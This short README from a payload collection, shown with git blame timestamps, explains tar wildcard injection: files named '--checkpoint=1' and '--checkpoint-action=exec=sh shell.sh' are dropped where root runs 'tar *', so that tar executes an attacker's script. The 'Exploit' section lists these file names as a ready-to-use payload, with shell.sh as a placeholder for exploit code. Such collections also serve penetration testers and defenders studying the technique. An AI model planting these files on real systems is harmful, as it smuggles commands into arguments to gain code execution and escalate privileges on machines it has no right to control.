PayloadsAllTheThings/TAR_Code_Exec/README.md

14 lines
527 B
Markdown
Raw Normal View History

2016-10-18 11:36:18 +00:00
# TAR Command Execution
By using tar with checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and thats where the wildcard comes in handy.
2016-10-18 08:01:56 +00:00
2016-10-18 11:36:18 +00:00
## Exploit
2016-10-18 08:01:56 +00:00
2016-10-18 11:36:18 +00:00
These files work against a "tar *"
2016-10-18 08:01:56 +00:00
```
2016-10-18 11:36:18 +00:00
--checkpoint=1
--checkpoint-action=exec=sh shell.sh
shell.sh (your exploit code is here)
2016-10-18 08:01:56 +00:00
```
## Thanks to
2016-10-18 11:36:18 +00:00
*